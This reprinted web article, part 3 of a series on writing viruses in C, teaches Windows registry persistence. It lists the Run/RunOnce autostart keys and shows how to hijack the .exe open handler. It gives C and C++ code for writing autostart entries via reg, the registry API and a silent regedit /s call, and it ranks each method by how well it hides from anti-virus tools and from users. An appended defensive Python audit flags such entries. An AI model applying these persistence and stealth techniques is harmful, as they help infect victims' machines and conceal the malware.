[Reprint] Using the C language to write viruses (3)

Source: Internet
Author: User
This article only discusses virus-writing technology and does not discuss harm to computers or networks. The example program is only a harmless template; you may extend the experiment within technical and legal bounds.

Before reading this program, make sure you will not use it for illegal activities. Any loss caused to others or to organizations through your use of this program is your own responsibility, and I accept no liability for it; if you do not agree, please leave now.

Reposting in any form (except by myself) is refused; otherwise it is copyright infringement, and the Software Protection Regulations of the People's Republic of China, the Copyright Law of the People's Republic of China, the Intellectual Property Law of the People's Republic of China and other laws will impose the maximum sanctions!!

This is the third article. This time we write about some programming techniques and virus principles that involve the registry.
Registry
1. Registry locations that can be used for virus startup:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
The above are only some of the default autorun locations in the registry. In fact, the virus path can also be appended to the shell the system starts after boot (shell=explorer.exe), and there are other ways of running automatically through the registry at boot.
2. Associated file types
Under HKEY_CLASSES_ROOT in the registry you can change the default program that opens a file type. For example, if you change the program that opens EXE files to the virus you wrote, the virus runs in place of the program whenever an EXE file is run.
Example:
Go to HKEY_CLASSES_ROOT\exefile\shell\open\command in the registry and change the (Default) value to c:\windows\svchost.exe "%1" %*. Then, whenever an .exe file is run, only C:\windows\svchost.exe

3. How to modify the registry:
(1) Use the reg command to add and modify registry entries:
To use the reg command, type REG /? and read the Windows command help.
Main format:
REG operation [parameter list]

operation [ QUERY | ADD | DELETE | COPY | SAVE | LOAD | UNLOAD | RESTORE | COMPARE | EXPORT | IMPORT ]
For example, to add a value named svchost under HKLM\Software\Microsoft\Windows\CurrentVersion\Run with the data C:\WINDOWS\SYSTEM\svchost.exe:

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v svchost /d C:\WINDOWS\SYSTEM\svchost.exe /f

There are two main ways to invoke the reg command from C: one is the system function, the other is the spawn family of functions (such as spawnl). For details on using system and spawnl, see other references; only an example is given here.

For example, use the system function to run the reg command that adds the value svchost under HKLM\Software\Microsoft\Windows\CurrentVersion\Run with the data C:\WINDOWS\SYSTEM\svchost.exe (backslashes are doubled inside the C string literal):

system("reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v svchost /d C:\\Windows\\System\\svchost.exe /f");

Comment and conclusion: adding a registry entry with the reg command calls a system command (tool) directly to modify the registry. If it is intercepted by anti-virus software, the modification appears to come from C:\windows\system32\reg.exe, which makes the virus hard to locate. However, because reg is a console command, a black console window appears when it is called, which tells the infected user that something is running and is not conducive to hiding the virus.

(2) Use the Windows API to add and modify registry entries
The Windows API provides about 25 functions for reading, writing and deleting registry keys and values and for opening them, including:
RegCloseKey
RegConnectRegistry
RegCreateKey
RegCreateKeyEx
RegDeleteKey
RegDeleteValue
RegEnumKey
RegFlushKey
RegGetKeySecurity (not available on Windows 9x)
RegLoadKey
RegNotifyChangeKeyValue (not available on Windows 9x)
RegOpenKey
RegOpenKeyEx
RegQueryInfoKey
RegQueryValue
RegQueryValueEx
RegReplaceKey
RegRestoreKey (not available on Windows 9x)
RegSaveKey
RegSetKeySecurity (not available on Windows 9x)
RegSetValue
RegSetValueEx
RegUnLoadKey
and so on. Using these functions requires including windows.h under a 32-bit C compiler. As in (1), see other references for details of their use; only an example is given here.
For example, use the registry API to add a value named svchost under HKLM\Software\Microsoft\Windows\CurrentVersion\Run with the data C:\WINDOWS\SYSTEM\svchost.exe.

// TRegistry is the C++ Builder (VCL) wrapper around the RegXxx API functions listed above.
TRegistry *Registry = new TRegistry();
Registry->RootKey = HKEY_LOCAL_MACHINE;
Registry->OpenKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
Registry->WriteString("svchost", "C:\\Windows\\System\\svchost.exe");
Registry->CloseKey();
delete Registry;

Comment and conclusion: adding a registry entry with the Windows API modifies the registry directly without calling a system command (tool). If it is intercepted by anti-virus software, the path of the virus file that made the modification is displayed, which makes the virus easy to find. However, since the Windows API modifies the registry quietly with nothing shown in the foreground, it is hard for the infected user to notice if the call is not blocked, which helps the virus hide.
(3) Use Regedit to add and modify registry entries
Regedit is the Registry Editor, but it also has a /S parameter: calling regedit /s <registry file> modifies the registry in the background without any prompt. Here, too, the spawnl function is used to call it.

For example, use the spawnl function to call regedit and add a value named wjview32 under HKLM\Software\Microsoft\Windows\CurrentVersion\Run with the data c:\windows\wjview32.com /s (in the .reg file format each backslash is written twice, so it appears four times in the C string literal):
#include <stdio.h>
#include <process.h>   /* spawnl, P_NOWAIT */

/* Contents of the .reg file: REGEDIT4 header, key name in brackets, then "name"="data". */
char *regadd = "REGEDIT4\n[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32\"=\"C:\\\\windows\\\\wjview32.com /s\"";
FILE *output;
if ((output = fopen("$", "w")) != NULL)   /* "$" is the temporary .reg file name */
{
    fprintf(output, "%s", regadd);
    fclose(output);
    /* mode 1 (P_NOWAIT) as in the original; argv[0], then "/S" and the file name as separate arguments */
    spawnl(P_NOWAIT, "C:\\WINDOWS\\regedit.exe", "regedit.exe", "/S", "$", NULL);
}
Comment and conclusion: the spawnl function plus Regedit combines the advantages of the Windows API and reg methods. If it is intercepted by anti-virus software, the modification appears to come from c:\windows\regedit.exe, which makes the virus path hard to find and helps the virus hide. Regedit also modifies the registry quietly with nothing shown in the foreground, so if the call is not blocked it is hard for the infected user to notice, which helps hide the virus.
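From the defender's side, an audit added here (not part of the original article): the Python below parses a REGEDIT4-style file such as the one the spawnl example writes and reports every value it would place under the autostart keys of section 1, or any change to the exefile handler of section 2 away from its stock "%1" %* command line. The .reg text at the bottom is a constructed sample, and the key list covers all four Run-family subkeys under both hives.

```python
import re
# Autostart keys from section 1 (all four Run-family subkeys, both hives) and the
# exefile handler from section 2, lower-cased with full hive names.
AUTOSTART_KEYS = {f"{hive}\\software\\microsoft\\windows\\currentversion\\{sub}"
                  for hive in ("hkey_local_machine", "hkey_current_user")
                  for sub in ("run", "runonce", "runservices", "runservicesonce")}
EXEFILE_COMMAND = "hkey_classes_root\\exefile\\shell\\open\\command"
EXPECTED_EXEFILE_DEFAULT = '"%1" %*'  # stock handler: run the file itself with its arguments
HIVE_ALIASES = {"hklm": "hkey_local_machine", "hkcu": "hkey_current_user", "hkcr": "hkey_classes_root"}
def normalise_key(line):
    # '[HKLM\Software\X]' -> 'hkey_local_machine\software\x'
    hive, sep, rest = line.strip().strip("[]").lower().partition("\\")
    return HIVE_ALIASES.get(hive, hive) + sep + rest

def unquote(data):
    """Strip a REG_SZ value's quotes and undo .reg escaping; dword:/hex: data is left as is."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return re.sub(r"\\(.)", r"\1", data[1:-1])
    return data

def parse_reg_file(text):
    """Parse REGEDIT4 / 'Windows Registry Editor' text into {key: {value name: data}}."""
    entries, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith(";") or line.upper().startswith(("REGEDIT4", "WINDOWS REGISTRY")):
            continue
        if line.startswith("["):  # a section header names the key the following lines write to
            current = normalise_key(line)
            entries.setdefault(current, {})
            continue
        m = re.match(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$', line)  # @ is the (Default) value
        if m and current is not None:
            entries[current]["(default)" if m.group(1) == "@" else m.group(2)] = unquote(m.group(3))
    return entries

def audit_reg_file(text):
    """Return (kind, key, name, data) for every autostart write or tampered exefile handler."""
    findings = []
    for key, values in parse_reg_file(text).items():
        if key in AUTOSTART_KEYS:
            findings += [("autostart", key, n, d) for n, d in values.items()]
        elif key == EXEFILE_COMMAND and values.get("(default)") not in (None, EXPECTED_EXEFILE_DEFAULT):
            findings.append(("exefile-hijack", key, "(default)", values["(default)"]))
    return findings

# Constructed sample: the Run entry the article's regedit example writes plus the section 2 exefile hijack.
SAMPLE_REG = r'''REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"wjview32"="C:\\windows\\wjview32.com /s"
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="c:\\windows\\svchost.exe \"%1\" %*"'''
```

Running audit_reg_file(SAMPLE_REG) yields one "autostart" finding for wjview32 and one "exefile-hijack" finding; the same parser can be pointed at a regedit export of a live machine to review its autostart entries.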
